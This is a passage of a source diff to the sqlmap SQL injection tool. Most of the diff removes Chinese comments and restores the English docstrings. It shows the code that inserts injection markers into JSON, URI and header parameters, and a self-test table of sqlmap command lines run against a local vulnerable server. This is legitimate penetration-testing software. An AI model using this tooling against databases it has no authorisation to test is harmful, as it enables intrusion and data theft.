+from lib.core.common import getSafeExString
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.enums import AUTOCOMPLETE_TYPE
+from lib.core.enums import OS
+from lib.core.settings import IS_WIN
+from lib.core.settings import MAX_HISTORY_LENGTH

 try:
-    # 尝试导入rlcompleter模块用于命令补全
    import rlcompleter

    class CompleterNG(rlcompleter.Completer):
-        """自定义的命令补全器类，继承自rlcompleter.Completer"""
        def global_matches(self, text):
            """
-            计算简单名称的匹配项
-            参数:
-                text: 要匹配的文本
-            返回:
-                匹配的命令列表
+            Compute matches when text is a simple name.
+            Return a list of all names currently defined in self.namespace
+            that match.
            """
+
            matches = []
            n = len(text)

@ -43,34 +38,27 @@ try:

            return matches
 except:
-    # 如果导入失败，禁用readline功能
    readline._readline = None

 def readlineAvailable():
    """
-    检查readline模块是否可用
-    在Windows系统的Python默认安装中通常不可用
+    Check if the readline is available. By default
+    it is not in Python default installation on Windows
    """
+
    return readline._readline is not None

 def clearHistory():
-    """清除命令行历史记录"""
    if not readlineAvailable():
        return

    readline.clear_history()

 def saveHistory(completion=None):
-    """
-    保存命令行历史记录到文件
-    参数:
-        completion: 自动完成类型，决定历史记录保存的位置
-    """
    try:
        if not readlineAvailable():
            return

-        # 根据不同的自动完成类型选择不同的历史记录文件路径
        if completion == AUTOCOMPLETE_TYPE.SQL:
            historyPath = paths.SQL_SHELL_HISTORY
        elif completion == AUTOCOMPLETE_TYPE.OS:
@ -80,14 +68,12 @@ def saveHistory(completion=None):
        else:
            historyPath = paths.SQLMAP_SHELL_HISTORY

-        # 创建历史记录文件
        try:
            with open(historyPath, "w+"):
                pass
        except:
            pass

-        # 设置历史记录最大长度并写入文件
        readline.set_history_length(MAX_HISTORY_LENGTH)
        try:
            readline.write_history_file(historyPath)
@ -98,17 +84,11 @@ def saveHistory(completion=None):
        pass

 def loadHistory(completion=None):
-    """
-    从文件加载命令行历史记录
-    参数:
-        completion: 自动完成类型，决定从哪个文件加载历史记录
-    """
    if not readlineAvailable():
        return

    clearHistory()

-    # 根据自动完成类型选择历史记录文件路径
    if completion == AUTOCOMPLETE_TYPE.SQL:
        historyPath = paths.SQL_SHELL_HISTORY
    elif completion == AUTOCOMPLETE_TYPE.OS:
@ -118,7 +98,6 @@ def loadHistory(completion=None):
    else:
        historyPath = paths.SQLMAP_SHELL_HISTORY

-    # 如果历史记录文件存在，尝试加载它
    if os.path.exists(historyPath):
        try:
            readline.read_history_file(historyPath)
@ -132,19 +111,12 @@ def loadHistory(completion=None):
                logger.warning(warnMsg)

 def autoCompletion(completion=None, os=None, commands=None):
-    """
-    设置命令行自动完成功能
-    参数:
-        completion: 自动完成类型
-        os: 操作系统类型
-        commands: 自定义命令列表
-    """
    if not readlineAvailable():
        return

    if completion == AUTOCOMPLETE_TYPE.OS:
        if os == OS.WINDOWS:
-            # Windows系统的常用命令
+            # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
            completer = CompleterNG({
                "attrib": None, "copy": None, "del": None,
                "dir": None, "echo": None, "fc": None,
@ -155,7 +127,7 @@ def autoCompletion(completion=None, os=None, commands=None):
            })

        else:
-            # Unix/Linux系统的常用命令
+            # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
            completer = CompleterNG({
                "cat": None, "chmod": None, "chown": None,
                "cp": None, "cut": None, "date": None, "df": None,
@ -166,17 +138,14 @@ def autoCompletion(completion=None, os=None, commands=None):
                "uname": None, "whoami": None,
            })

-        # 设置命令补全器
        readline.set_completer(completer.complete)
        readline.parse_and_bind("tab: complete")

    elif commands:
-        # 使用自定义命令列表设置补全器
        completer = CompleterNG(dict(((_, None) for _ in commands)))
        readline.set_completer_delims(' ')
        readline.set_completer(completer.complete)
        readline.parse_and_bind("tab: complete")

-    # 加载历史记录并注册退出时保存历史记录
    loadHistory(completion)
    atexit.register(saveHistory, completion)
--- a/src/sqlmap-master/lib/core/subprocessng.py
+++ b/src/sqlmap-master/lib/core/subprocessng.py
@ -16,22 +16,17 @@ from lib.core.compat import buffer
 from lib.core.convert import getBytes
 from lib.core.settings import IS_WIN

-# 判断是否为Windows系统
 if IS_WIN:
    try:
-        # 导入Windows系统的文件读写和管道操作模块
        from win32file import ReadFile, WriteFile
        from win32pipe import PeekNamedPipe
    except ImportError:
        pass
-    # 导入Windows系统的控制台输入输出模块
    import msvcrt
 else:
-    # 导入Linux系统的文件描述符选择和文件锁定模块
    import select
    import fcntl

-# 从文件描述符中阻塞读取数据
 def blockingReadFromFD(fd):
    # Quick twist around original Twisted function
    # Blocking read from a non-blocking file descriptor
@ -62,35 +57,27 @@ def blockingWriteToFD(fd, data):
            data_length = len(data)
            wrote_data = os.write(fd, data)
        except (OSError, IOError) as io:
-            # 如果错误码为EAGAIN或EINTR，则继续循环
            if io.errno in (errno.EAGAIN, errno.EINTR):
                continue
            else:
-                # 否则抛出异常
                raise

-        # 如果写入的数据长度小于数据总长度，则继续写入剩余的数据
        if wrote_data < data_length:
            blockingWriteToFD(fd, data[wrote_data:])

-        # 如果写入的数据长度等于数据总长度，则跳出循环
        break

 # the following code is taken from http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/
 class Popen(subprocess.Popen):
-    # 从标准输出接收数据
    def recv(self, maxsize=None):
        return self._recv('stdout', maxsize)

-    # 从标准错误接收数据
    def recv_err(self, maxsize=None):
        return self._recv('stderr', maxsize)

-    # 发送数据并接收标准输出和标准错误的数据
    def send_recv(self, input='', maxsize=None):
        return self.send(input), self.recv(maxsize), self.recv_err(maxsize)

-    # 获取连接的最大大小
    def get_conn_maxsize(self, which, maxsize):
        if maxsize is None:
            maxsize = 1024
@ -98,12 +85,10 @@ class Popen(subprocess.Popen):
            maxsize = 1
        return getattr(self, which), maxsize

-    # 关闭连接
    def _close(self, which):
        getattr(self, which).close()
        setattr(self, which, None)

-    # 在Windows系统下发送数据
    if IS_WIN:
        def send(self, input):
            if not self.stdin:
@ -121,7 +106,6 @@ class Popen(subprocess.Popen):

            return written

-        # 在Windows系统下接收数据
        def _recv(self, which, maxsize):
            conn, maxsize = self.get_conn_maxsize(which, maxsize)
            if conn is None:
@ -144,7 +128,6 @@ class Popen(subprocess.Popen):
            if self.universal_newlines:
                read = self._translate_newlines(read)
            return read
-    # 在非Windows系统下发送数据
    else:
        def send(self, input):
            if not self.stdin:
@ -162,7 +145,6 @@ class Popen(subprocess.Popen):

            return written

-        # 在非Windows系统下接收数据
        def _recv(self, which, maxsize):
            conn, maxsize = self.get_conn_maxsize(which, maxsize)
            if conn is None:
@ -187,7 +169,6 @@ class Popen(subprocess.Popen):
                if not conn.closed:
                    fcntl.fcntl(conn, fcntl.F_SETFL, flags)

-# 从进程p中接收数据，最多等待t秒，最多接收e次，每次接收tr个字节，从标准错误接收数据
 def recv_some(p, t=.1, e=1, tr=5, stderr=0):
    if tr < 1:
        tr = 1
@ -208,7 +189,6 @@ def recv_some(p, t=.1, e=1, tr=5, stderr=0):
            time.sleep(max((x - time.time()) / tr, 0))
    return b''.join(y)

-# 向进程p发送数据
 def send_all(p, data):
    if not data:
        return
--- a/src/sqlmap-master/lib/core/target.py
+++ b/src/sqlmap-master/lib/core/target.py
@ -131,54 +131,35 @@ def _setRequestParams():

            return retVal

-        # 如果kb.processUserMarks为None且kb.customInjectionMark在conf.data中
        if kb.processUserMarks is None and kb.customInjectionMark in conf.data:
-            # 提示用户是否要处理
            message = "custom injection marker ('%s') found in %s " % (kb.customInjectionMark, conf.method)
            message += "body. Do you want to process it? [Y/n/q] "
            choice = readInput(message, default='Y').upper()

-            # 如果用户选择退出
            if choice == 'Q':
                raise SqlmapUserQuitException
            else:
-                # 将kb.processUserMarks设置为用户的选择
                kb.processUserMarks = choice == 'Y'

-                # 如果用户选择处理
                if kb.processUserMarks:
-                    # 将kb.testOnlyCustom设置为True
                    kb.testOnlyCustom = True

-        # 如果conf.data中包含JSON数据
        if re.search(JSON_RECOGNITION_REGEX, conf.data):
-            # 提示用户是否要处理
            message = "JSON data found in %s body. " % conf.method
            message += "Do you want to process it? [Y/n/q] "
            choice = readInput(message, default='Y').upper()

-            # 如果用户选择退出
            if choice == 'Q':
                raise SqlmapUserQuitException
-            # 如果用户选择处理
            elif choice == 'Y':
-                # 将kb.postHint设置为POST_HINT.JSON
                kb.postHint = POST_HINT.JSON
-                # 如果kb.processUserMarks为True且kb.customInjectionMark在conf.data中
                if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
-                    # 将conf.data设置为未编码的原始值
                    conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
-                    # 将kb.customInjectionMark替换为ASTERISK_MARKER
                    conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
-                    # 将conf.data中的字符串替换为字符串+kb.customInjectionMark
                    conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".*?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
-                    # 将conf.data中的字符串替换为字符串+kb.customInjectionMark
                    conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*")"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
-                    # 将conf.data中的数字替换为数字+kb.customInjectionMark
                    conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
-                    # 将conf.data中的布尔值替换为布尔值+kb.customInjectionMark
                    conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
-                    # 将conf.data中的数组替换为数组+kb.customInjectionMark
                    for match in re.finditer(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data):
                        if not (conf.testParameter and match.group("name") not in conf.testParameter):
                            _ = match.group(2)
@ -187,37 +168,23 @@ def _setRequestParams():
                                _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _)
                                conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))

-        # 如果conf.data中包含JSON-like数据
        elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
-            # 提示用户是否要处理
            message = "JSON-like data found in %s body. " % conf.method
            message += "Do you want to process it? [Y/n/q] "
            choice = readInput(message, default='Y').upper()

-            # 如果用户选择退出
            if choice == 'Q':
                raise SqlmapUserQuitException
-            # 如果用户选择处理
            elif choice == 'Y':
-                # 将kb.postHint设置为POST_HINT.JSON_LIKE
                kb.postHint = POST_HINT.JSON_LIKE
-                # 如果kb.processUserMarks为True且kb.customInjectionMark在conf.data中
                if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
-                    # 将conf.data设置为未编码的原始值
                    conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
-                    # 将kb.customInjectionMark替换为ASTERISK_MARKER
                    conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
-                    # 如果conf.data中包含双引号
                    if '"' in conf.data:
-                        # 将conf.data中的字符串替换为字符串+kb.customInjectionMark
                        conf.data = re.sub(r'((?P<name>"[^"]+"|\w+)\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
-                        # 将conf.data中的数字替换为数字+kb.customInjectionMark
                        conf.data = re.sub(r'((?P<name>"[^"]+"|\w+)\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % kb.customInjectionMark), conf.data)
-                    # 如果conf.data中包含单引号
                    else:
-                        # 将conf.data中的字符串替换为字符串+kb.customInjectionMark
                        conf.data = re.sub(r"((?P<name>'[^']+'|\w+)\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % kb.customInjectionMark), conf.data)
-                        # 将conf.data中的数字替换为数字+kb.customInjectionMark
                        conf.data = re.sub(r"((?P<name>'[^']+'|\w+)\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % kb.customInjectionMark), conf.data)

        elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
@ -280,71 +247,52 @@ def _setRequestParams():

    kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks

-    # 如果配置的URL中包含URI_INJECTABLE_REGEX，并且没有GET或POST参数，并且没有提供POST提示，并且没有在data中提供自定义注入标记，并且URL以http开头
    if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
-        # 警告信息
        warnMsg = "you've provided target URL without any GET "
        warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
        warnMsg += "and without providing any POST parameters "
        warnMsg += "through option '--data'"
        logger.warning(warnMsg)

-        # 提示用户是否要在目标URL本身尝试URI注入
        message = "do you want to try URI injections "
        message += "in the target URL itself? [Y/n/q] "
        choice = readInput(message, default='Y').upper()

-        # 如果用户选择退出
        if choice == 'Q':
            raise SqlmapUserQuitException
-        # 如果用户选择尝试URI注入
        elif choice == 'Y':
            conf.url = "%s%s" % (conf.url, kb.customInjectionMark)
            kb.processUserMarks = True

-    # 遍历URI、自定义POST和自定义头部
    for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))):
-        # 如果是自定义头部，并且配置了表单或爬取深度，则跳过
        if place == PLACE.CUSTOM_HEADER and any((conf.forms, conf.crawlDepth)):
            continue

-        # 如果是自定义头部，则替换掉PROBLEMATIC_CUSTOM_INJECTION_PATTERNS，否则直接赋值
        _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or ""
-        # 如果自定义注入标记在_中
        if kb.customInjectionMark in _:
-            # 如果kb.processUserMarks为None
            if kb.processUserMarks is None:
-                # 构造提示信息
                lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'}
                message = "custom injection marker ('%s') found in option " % kb.customInjectionMark
                message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place]
                choice = readInput(message, default='Y').upper()

-                # 如果用户选择退出
                if choice == 'Q':
                    raise SqlmapUserQuitException
                else:
                    kb.processUserMarks = choice == 'Y'

-                    # 如果用户选择处理自定义注入标记
                    if kb.processUserMarks:
                        kb.testOnlyCustom = True

-                        # 如果自定义注入标记在_中
                        if "=%s" % kb.customInjectionMark in _:
-                            # 警告信息
                            warnMsg = "it seems that you've provided empty parameter value(s) "
                            warnMsg += "for testing. Please, always use only valid parameter values "
                            warnMsg += "so sqlmap could be able to run properly"
                            logger.warning(warnMsg)

-            # 如果没有处理自定义注入标记
            if not kb.processUserMarks:
-                # 如果是URI
                if place == PLACE.URI:
-                    # 获取查询字符串
                    query = _urllib.parse.urlsplit(value).query
-                    # 如果有查询字符串
                    if query:
                        parameters = conf.parameters[PLACE.GET] = query
                        paramDict = paramToDict(PLACE.GET, parameters)
@ -453,7 +401,6 @@ def _setRequestParams():
                    conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]
                    testableParameters = True

-    # 检查并设置HashDB SQLite文件以实现查询恢复功能
    if not conf.parameters:
        errMsg = "you did not provide any GET, POST and Cookie "
        errMsg += "parameter, neither an User-Agent, Referer or Host header value"
@ -464,15 +411,12 @@ def _setRequestParams():
        errMsg += "within the given request data"
        raise SqlmapGenericException(errMsg)

-    # 检查并设置HashDB SQLite文件以实现查询恢复功能
    if conf.csrfToken:
-        # 检查csrfToken是否存在于GET、POST、Cookie或header值中
        if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}), conf.paramDict.get(PLACE.COOKIE, {}))) and not re.search(r"\b%s\b" % conf.csrfToken, conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}) and not all(re.search(conf.csrfToken, _, re.I) for _ in conf.paramDict.get(PLACE.URI, {}).values()):
            errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken._original
            errMsg += "found in provided GET, POST, Cookie or header values"
            raise SqlmapGenericException(errMsg)
    else:
-        # 如果没有提供csrfToken，则检查参数中是否包含anti-CSRF token
        for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
            if conf.csrfToken:
                break
@ -482,7 +426,6 @@ def _setRequestParams():
                    message = "%sparameter '%s' appears to hold anti-CSRF token. " % ("%s " % place if place != parameter else "", parameter)
                    message += "Do you want sqlmap to automatically update it in further requests? [y/N] "

-                    # 如果用户选择更新，则将csrfToken设置为参数值
                    if readInput(message, default='N', boolean=True):
                        class _(six.text_type):
                            pass
@ -549,76 +492,49 @@ def _resumeDBMS():
    Resume stored DBMS information from HashDB
    """

-    # 从HashDB中恢复存储的DBMS信息
    value = hashDBRetrieve(HASHDB_KEYS.DBMS)

-    # 如果没有值
    if not value:
-        # 如果是离线模式
        if conf.offline:
-            # 抛出异常
            errMsg = "unable to continue in offline mode "
            errMsg += "because of lack of usable "
            errMsg += "session data"
            raise SqlmapNoneDataException(errMsg)
        else:
-            # 返回
            return

-    # 将值转换为小写
    dbms = value.lower()
-    # 设置DBMS版本为未知
    dbmsVersion = [UNKNOWN_DBMS_VERSION]
-    # 匹配支持的DBMS
    _ = "(%s)" % ('|'.join(SUPPORTED_DBMS))
-    # 在dbms中搜索匹配的DBMS
    _ = re.search(r"\A%s (.*)" % _, dbms, re.I)

-    # 如果匹配成功
    if _:
-        # 将dbms设置为匹配的DBMS
        dbms = _.group(1).lower()
-        # 将dbmsVersion设置为匹配的DBMS版本
        dbmsVersion = [_.group(2)]

-    # 如果用户提供了DBMS
    if conf.dbms:
-        # 设置check为True
        check = True
-        # 遍历DBMS_DICT中的值
        for aliases, _, _, _ in DBMS_DICT.values():
-            # 如果用户提供的DBMS在aliases中，而dbms不在aliases中
            if conf.dbms.lower() in aliases and dbms not in aliases:
-                # 设置check为False
                check = False
-                # 跳出循环
                break

-        # 如果check为False
        if not check:
-            # 提示用户
            message = "you provided '%s' as a back-end DBMS, " % conf.dbms
            message += "but from a past scan information on the target URL "
            message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms
            message += "Do you really want to force the back-end "
            message += "DBMS value? [y/N] "

-            # 如果用户输入y
            if not readInput(message, default='N', boolean=True):
-                # 设置conf.dbms为None
                conf.dbms = None
-                # 设置Backend的DBMS为dbms
                Backend.setDbms(dbms)
-                # 设置Backend的DBMS版本为dbmsVersion
                Backend.setVersionList(dbmsVersion)
    else:
-        # 提示用户恢复DBMS
        infoMsg = "resuming back-end DBMS '%s' " % dbms
        logger.info(infoMsg)

-        # 设置Backend的DBMS为dbms
        Backend.setDbms(dbms)
-        # 设置Backend的DBMS版本为dbmsVersion
        Backend.setVersionList(dbmsVersion)

 def _resumeOS():
@ -626,7 +542,6 @@ def _resumeOS():
    Resume stored OS information from HashDB
    """

-    # 从HashDB中恢复存储的操作系统信息
    value = hashDBRetrieve(HASHDB_KEYS.OS)

    if not value:
@ -638,7 +553,6 @@ def _resumeOS():
        infoMsg = "resuming back-end DBMS operating system '%s' " % os
        logger.info(infoMsg)

-        # 如果配置文件中的操作系统与从HashDB中恢复的操作系统不一致，则提示用户是否强制使用恢复的操作系统
        if conf.os and conf.os.lower() != os.lower():
            message = "you provided '%s' as back-end DBMS operating " % conf.os
            message += "system, but from a past scan information on the "
@ -647,13 +561,11 @@ def _resumeOS():
            message += "Do you really want to force the back-end DBMS "
            message += "OS value? [y/N] "

-            # 如果用户选择不强制使用恢复的操作系统，则将配置文件中的操作系统设置为恢复的操作系统
            if not readInput(message, default='N', boolean=True):
                conf.os = os
        else:
            conf.os = os

-        # 设置后端数据库操作系统的值
        Backend.setOs(conf.os)

 def _setResultsFile():
@ -662,21 +574,17 @@ def _setResultsFile():
    multiple target mode.
    """

-    # 如果不是在多目标模式下运行，则不创建结果文件
    if not conf.multipleTargets:
        return

-    # 如果没有指定结果文件路径，则使用默认路径
    if not conf.resultsFP:
        conf.resultsFile = conf.resultsFile or os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
        found = os.path.exists(conf.resultsFile)

        try:
-            # 打开结果文件，如果文件不存在则创建
            conf.resultsFP = openFile(conf.resultsFile, "a", UNICODE_ENCODING, buffering=0)
        except (OSError, IOError) as ex:
            try:
-                # 如果无法创建结果文件，则使用临时文件
                warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFile, getUnicode(ex))
                handle, conf.resultsFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv")
                os.close(handle)
@ -690,7 +598,6 @@ def _setResultsFile():
                errMsg += "create temporary files and/or directories"
                raise SqlmapSystemException(errMsg)

-        # 如果结果文件不存在，则写入表头
        if not found:
            conf.resultsFP.writelines("Target URL,Place,Parameter,Technique(s),Note(s)%s" % os.linesep)

@ -701,19 +608,15 @@ def _createFilesDir():
    Create the file directory.
    """

-    # 如果没有指定读取文件或公共文件，则不创建文件目录
    if not any((conf.fileRead, conf.commonFiles)):
        return

-    # 设置文件目录路径
    conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname

-    # 如果文件目录不存在，则创建
    if not os.path.isdir(conf.filePath):
        try:
            os.makedirs(conf.filePath)
        except OSError as ex:
-            # 如果无法创建文件目录，则使用临时目录
            tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
            warnMsg = "unable to create files directory "
            warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
@ -727,19 +630,15 @@ def _createDumpDir():
    Create the dump directory.
    """

-    # 如果没有指定导出表或导出所有表或搜索，则不创建导出目录
    if not conf.dumpTable and not conf.dumpAll and not conf.search:
        return

-    # 设置导出目录路径
    conf.dumpPath = safeStringFormat(paths.SQLMAP_DUMP_PATH, conf.hostname)

-    # 如果导出目录不存在，则创建
    if not os.path.isdir(conf.dumpPath):
        try:
            os.makedirs(conf.dumpPath)
        except Exception as ex:
-            # 如果无法创建导出目录，则使用临时目录
            tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
            warnMsg = "unable to create dump directory "
            warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
@ -757,15 +656,12 @@ def _createTargetDirs():
    Create the output directory.
    """

-    # 设置输出目录路径
    conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))

    try:
-        # 如果输出目录不存在，则创建
        if not os.path.isdir(conf.outputPath):
            os.makedirs(conf.outputPath)
    except (OSError, IOError, TypeError) as ex:
-        # 如果无法创建输出目录，则使用临时目录
        tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
        warnMsg = "unable to create output directory "
        warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
@ -777,7 +673,6 @@ def _createTargetDirs():
    conf.outputPath = getUnicode(conf.outputPath)

    try:
-        # 将目标信息写入目标文件
        with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f:
            f.write(getUnicode(kb.originalUrls.get(conf.url) or conf.url or conf.hostname))
            f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
@ -796,7 +691,6 @@ def _createTargetDirs():
        warnMsg = "something went wrong while saving target data ('%s')" % getSafeExString(ex)
        logger.warning(warnMsg)

-    # 创建导出目录和文件目录
    _createDumpDir()
    _createFilesDir()
    _configureDumper()
@ -870,9 +764,6 @@ def initTargetEnv():
    kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR

 def setupTargetEnv():
-    """
-    Setup target environment.
-    """
    _createTargetDirs()
    _setRequestParams()
    _setHashDB()
--- a/src/sqlmap-master/lib/core/testing.py
+++ b/src/sqlmap-master/lib/core/testing.py
@ -5,76 +5,103 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的标准库
-import doctest  # 用于运行文档测试
-import logging  # 用于日志记录
-import os  # 用于操作系统相关功能
-import random  # 用于生成随机数
-import re  # 用于正则表达式操作
-import socket  # 用于网络通信
-import sqlite3  # 用于SQLite数据库操作
-import sys  # 用于系统相关功能
-import tempfile  # 用于创建临时文件
-import threading  # 用于多线程操作
-import time  # 用于时间相关操作
-
-# 导入自定义模块
-from extra.vulnserver import vulnserver  # 导入漏洞测试服务器
-from lib.core.common import clearConsoleLine  # 用于清除控制台行
-from lib.core.common import dataToStdout  # 用于向标准输出写数据
-from lib.core.common import randomInt  # 用于生成随机整数
-from lib.core.common import randomStr  # 用于生成随机字符串
-from lib.core.common import shellExec  # 用于执行shell命令
-from lib.core.compat import round  # 用于数字四舍五入
-from lib.core.convert import encodeBase64  # 用于Base64编码
-from lib.core.data import kb  # 用于存储全局知识库数据
-from lib.core.data import logger  # 用于日志记录
-from lib.core.data import paths  # 用于存储路径信息
-from lib.core.data import queries  # 用于存储SQL查询
-from lib.core.patch import unisonRandom  # 用于随机数生成
-from lib.core.settings import IS_WIN  # 用于判断是否Windows系统
+import doctest
+import logging
+import os
+import random
+import re
+import socket
+import sqlite3
+import sys
+import tempfile
+import threading
+import time
+
+from extra.vulnserver import vulnserver
+from lib.core.common import clearConsoleLine
+from lib.core.common import dataToStdout
+from lib.core.common import randomInt
+from lib.core.common import randomStr
+from lib.core.common import shellExec
+from lib.core.compat import round
+from lib.core.convert import encodeBase64
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.data import queries
+from lib.core.patch import unisonRandom
+from lib.core.settings import IS_WIN

 def vulnTest():
    """
-    运行针对'vulnserver'的漏洞测试
-    这个函数执行一系列预定义的测试用例来验证sqlmap的功能
+    Runs the testing against 'vulnserver'
    """

-    # 定义测试用例元组,每个测试用例包含命令行选项和预期检查项
    TESTS = (
-        ("-h", ("to see full list of options run with '-hh'",)),  # 帮助信息测试
-        ("--dependencies", ("sqlmap requires", "third-party library")),  # 依赖检查测试
-        # ... 更多测试用例 ...
+        ("-h", ("to see full list of options run with '-hh'",)),
+        ("--dependencies", ("sqlmap requires", "third-party library")),
+        ("-u <url> --data=\"reflect=1\" --flush-session --wizard --disable-coloring", ("Please choose:", "back-end DBMS: SQLite", "current user is DBA: True", "banner: '3.")),
+        ("-u <url> --data=\"code=1\" --code=200 --technique=B --banner --no-cast --flush-session", ("back-end DBMS: SQLite", "banner: '3.", "~COALESCE(CAST(")),
+        (u"-c <config> --flush-session --output-dir=\"<tmpdir>\" --smart --roles --statements --hostname --privileges --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'", "on SQLite it is not possible", "as the output directory")),
+        (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'",)),
+        ("-m <multiple> --flush-session --technique=B --banner", ("/3] URL:", "back-end DBMS: SQLite", "banner: '3.")),
+        ("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")),
+        ("-u \"<url>&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)),
+        ("--list-tampers", ("between", "MySQL", "xforwardedfor")),
+        ("-r <request> --flush-session -v 5 --test-skip=\"heavy\" --save=<config>", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")),
+        ("-c <config>", ("CloudFlare", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind")),
+        ("-l <log> --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")),
+        ("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")),
+        ("-u <base> --flush-session --data=\"id=1&_=Eewef6oh\" --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")),
+        ("-u <base64> -p id --base64=id --data=\"base64=true\" --flush-session --banner --technique=B", ("banner: '3.",)),
+        ("-u <base64> -p id --base64=id --data=\"base64=true\" --flush-session --tables --technique=U", (" users ",)),
+        ("-u <url> --flush-session --banner --technique=B --disable-precon --not-string \"no results\"", ("banner: '3.",)),
+        ("-u <url> --flush-session --encoding=gbk --banner --technique=B --first=1 --last=2", ("banner: '3.'",)),
+        ("-u <url> --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")),
+        ("-u <base> --flush-session --technique=BU --data=\"{\\\"id\\\": 1}\" --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: UNION query", "banner: '3.")),
